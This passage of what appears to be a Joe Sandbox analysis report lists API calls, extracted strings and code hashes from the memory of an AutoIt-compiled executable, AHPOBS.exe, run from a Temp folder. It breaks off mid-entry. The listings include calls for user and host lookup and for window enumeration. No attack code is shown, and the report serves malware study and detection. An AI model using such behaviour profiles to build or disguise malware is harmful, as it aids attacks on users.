                                      • String ID:
                                      • API String ID: 2547909840-0
                                      • Opcode ID: 182a9fd14032e8e93bb148eed081eedfbc5356b8f5808f875ed41f9760706005
                                      • Instruction ID: e17d583989bb1df9e9dd6b28cd90faaf4a95b78209a4298828de810110d6b8cb
                                      • Opcode Fuzzy Hash: 182a9fd14032e8e93bb148eed081eedfbc5356b8f5808f875ed41f9760706005
                                      • Instruction Fuzzy Hash: 9621EAB2800109ABC721DF50DC84FEEB7B8AB48300F5045DEF60997240EB799B84CFA4
                                      APIs
                                      • OleInitialize.OLE32(00000000), ref: 0046CF63
                                      • _wcslen.LIBCMT ref: 0046CF75
                                      • CreateBindCtx.OLE32(00000000,?), ref: 0046D01F
                                      • MkParseDisplayName.OLE32(?,?,?,?), ref: 0046D065
                                        • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                        • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                      • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0046D10B
                                      • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0046D125
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Variant$Copy$ActiveBindClearCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcslen
                                      • String ID:
                                      • API String ID: 2728119192-0
                                      • Opcode ID: f61fbbea4972f354fdf485375051132769b1db82ff0cc1c8953d76aaf66a3e14
                                      • Instruction ID: 654cbfa1d8fefa06abeba6563afdd6e3d5f820db169d2b444807b365abf91408
                                      • Opcode Fuzzy Hash: f61fbbea4972f354fdf485375051132769b1db82ff0cc1c8953d76aaf66a3e14
                                      • Instruction Fuzzy Hash: 3D815E71604301ABD700EF65DC85F6BB3E8BF88704F10491EF64597291E775E905CB6A
                                      APIs
                                      • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                      • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                      • FindClose.KERNEL32(00000000), ref: 004339EB
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: FileFind$AttributesCloseFirst
                                      • String ID:
                                      • API String ID: 48322524-0
                                      • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                      • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                      • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                      • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                      APIs
                                      • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: NameUser
                                      • String ID:
                                      • API String ID: 2645101109-0
                                      • Opcode ID: e1f8f42dac8fc42dc827f7d1906d4f9b69e2e30a543b0124fa5ca55585ac3181
                                      • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                      • Opcode Fuzzy Hash: e1f8f42dac8fc42dc827f7d1906d4f9b69e2e30a543b0124fa5ca55585ac3181
                                      • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                      • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                      • TranslateMessage.USER32(?), ref: 00409556
                                      • DispatchMessageW.USER32(?), ref: 00409561
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Message$Peek$DispatchSleepTranslate
                                      • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                      • API String ID: 1762048999-758534266
                                      • Opcode ID: e0a738ed18a84ae3c3d14462e01dda1d2b106cb947bd4ad1d5a6f69c5601ad0e
                                      • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                      • Opcode Fuzzy Hash: e0a738ed18a84ae3c3d14462e01dda1d2b106cb947bd4ad1d5a6f69c5601ad0e
                                      • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                      Control-flow Graph

                                      APIs
                                      • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 00433A26
                                      • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000), ref: 00433A4E
                                      • _wcslen.LIBCMT ref: 00433A55
                                      • _wcscpy.LIBCMT ref: 00433A7B
                                      • _wcscat.LIBCMT ref: 00433A9C
                                      • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?), ref: 00433AC1
                                      • _wcscat.LIBCMT ref: 00433B0E
                                      • _wcscat.LIBCMT ref: 00433B15
                                      • __wcsicoll.LIBCMT ref: 00433B2F
                                      • _wcsncpy.LIBCMT ref: 00433B45
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                      • API String ID: 1503153545-1459072770
                                      • Opcode ID: d9605bc14267efd8b064930ad84d4b7d3473b5546fca9efa33410ce2d7d06cc4
                                      • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                      • Opcode Fuzzy Hash: d9605bc14267efd8b064930ad84d4b7d3473b5546fca9efa33410ce2d7d06cc4
                                      • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,?), ref: 0046EE79
                                      • GetForegroundWindow.USER32(?,?,?,?,?,?), ref: 0046F265
                                      • IsWindow.USER32(?), ref: 0046F29A
                                      • GetDesktopWindow.USER32 ref: 0046F356
                                      • EnumChildWindows.USER32(00000000), ref: 0046F35D
                                      • EnumWindows.USER32(0046130D,?), ref: 0046F365
                                        • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop_memmove
                                      • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                      • API String ID: 329138477-1919597938
                                      • Opcode ID: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
                                      • Instruction ID: 15289122aec5319afe5b60ce0d71565fabc5791e0031d8771947120ab82528ab
                                      • Opcode Fuzzy Hash: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
                                      • Instruction Fuzzy Hash: 83F10B714143019BDB00FF61D885AAFB3A4BF85308F44496FF94567282E779E909CBA7

                                      Control-flow Graph

                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\AHPOBS.exe,00000104,?), ref: 00401F4C
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • __wcsicoll.LIBCMT ref: 00402007
                                      • __wcsicoll.LIBCMT ref: 0040201D
                                      • __wcsicoll.LIBCMT ref: 00402033
                                        • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                      • __wcsicoll.LIBCMT ref: 00402049
                                      • _wcscpy.LIBCMT ref: 0040207C
                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\AHPOBS.exe,00000104), ref: 00428B5B
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Local\Temp\AHPOBS.exe$CMDLINE$CMDLINERAW
                                      • API String ID: 3948761352-4084628596
                                      • Opcode ID: 9da1b3193381690810b208c7d75faa33453babfcd00f8ecbd85b0c6d415dce0f
                                      • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                      • Opcode Fuzzy Hash: 9da1b3193381690810b208c7d75faa33453babfcd00f8ecbd85b0c6d415dce0f
                                      • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                      Control-flow Graph

                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __fread_nolock$_fseek_wcscpy
                                      • String ID: D)E$D)E$FILE
                                      • API String ID: 3888824918-361185794
                                      • Opcode ID: bbb9a7b4761f969ec3dea54db53098c81d7cb11648b9d4801554aeee4ae9a60f
                                      • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                      • Opcode Fuzzy Hash: bbb9a7b4761f969ec3dea54db53098c81d7cb11648b9d4801554aeee4ae9a60f
                                      • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                      • __wsplitpath.LIBCMT ref: 0040E41C
                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                      • _wcsncat.LIBCMT ref: 0040E433
                                      • __wmakepath.LIBCMT ref: 0040E44F
                                        • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                      • _wcscpy.LIBCMT ref: 0040E487
                                        • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                      • _wcscat.LIBCMT ref: 00427541
                                      • _wcslen.LIBCMT ref: 00427551
                                      • _wcslen.LIBCMT ref: 00427562
                                      • _wcscat.LIBCMT ref: 0042757C
                                      • _wcsncpy.LIBCMT ref: 004275BC
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                      • String ID: Include$\
                                      • API String ID: 3173733714-3429789819
                                      • Opcode ID: 5136d7da9c5bf0073b955d23f62714139c06d959485249d800a179de7f9c53a6
                                      • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                      • Opcode Fuzzy Hash: 5136d7da9c5bf0073b955d23f62714139c06d959485249d800a179de7f9c53a6
                                      • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                      Control-flow Graph

                                      • Control-flow graph image not captured; node list: 433493 WSAStartup; 4334be gethostname, gethostbyname; 433500 WSACleanup; 43351a inet_ntoa, WSACleanup; 433570 return path
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                      • String ID: 0.0.0.0
                                      • API String ID: 1965227024-3771769585
                                      • Opcode ID: 9a1ef4700a6ee80d5bd18ba7189a542239e9f412f046b2ffe7e413c52583f7c1
                                      • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                      • Opcode Fuzzy Hash: 9a1ef4700a6ee80d5bd18ba7189a542239e9f412f046b2ffe7e413c52583f7c1
                                      • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8

                                      Control-flow Graph

                                      APIs
                                      • _fseek.LIBCMT ref: 0045292B
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                      • __fread_nolock.LIBCMT ref: 00452961
                                      • __fread_nolock.LIBCMT ref: 00452971
                                      • __fread_nolock.LIBCMT ref: 0045298A
                                      • __fread_nolock.LIBCMT ref: 004529A5
                                      • _fseek.LIBCMT ref: 004529BF
                                      • _malloc.LIBCMT ref: 004529CA
                                      • _malloc.LIBCMT ref: 004529D6
                                      • __fread_nolock.LIBCMT ref: 004529E7
                                      • _free.LIBCMT ref: 00452A17
                                      • _free.LIBCMT ref: 00452A20
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                      • String ID:
                                      • API String ID: 1255752989-0
                                      • Opcode ID: 5a218435c829d2321405f0f111fa343c554f0bfb103fe72beee7d734b0ea72ca
                                      • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                      • Opcode Fuzzy Hash: 5a218435c829d2321405f0f111fa343c554f0bfb103fe72beee7d734b0ea72ca
                                      • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                      • RegisterClassExW.USER32(00000030), ref: 004104ED
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                      • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                      • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                      • ImageList_ReplaceIcon.COMCTL32(00BCF7D8,000000FF,00000000), ref: 00410552
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                      • API String ID: 2914291525-1005189915
                                      • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                      • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                      • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                      • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                      • LoadIconW.USER32(?,00000063), ref: 004103C0
                                      • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                      • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                      • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                      • RegisterClassExW.USER32(?), ref: 0041045D
                                        • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                        • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                        • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                        • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                        • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                        • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                        • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00BCF7D8,000000FF,00000000), ref: 00410552
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                      • String ID: #$0$AutoIt v3
                                      • API String ID: 423443420-4155596026
                                      • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                      • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
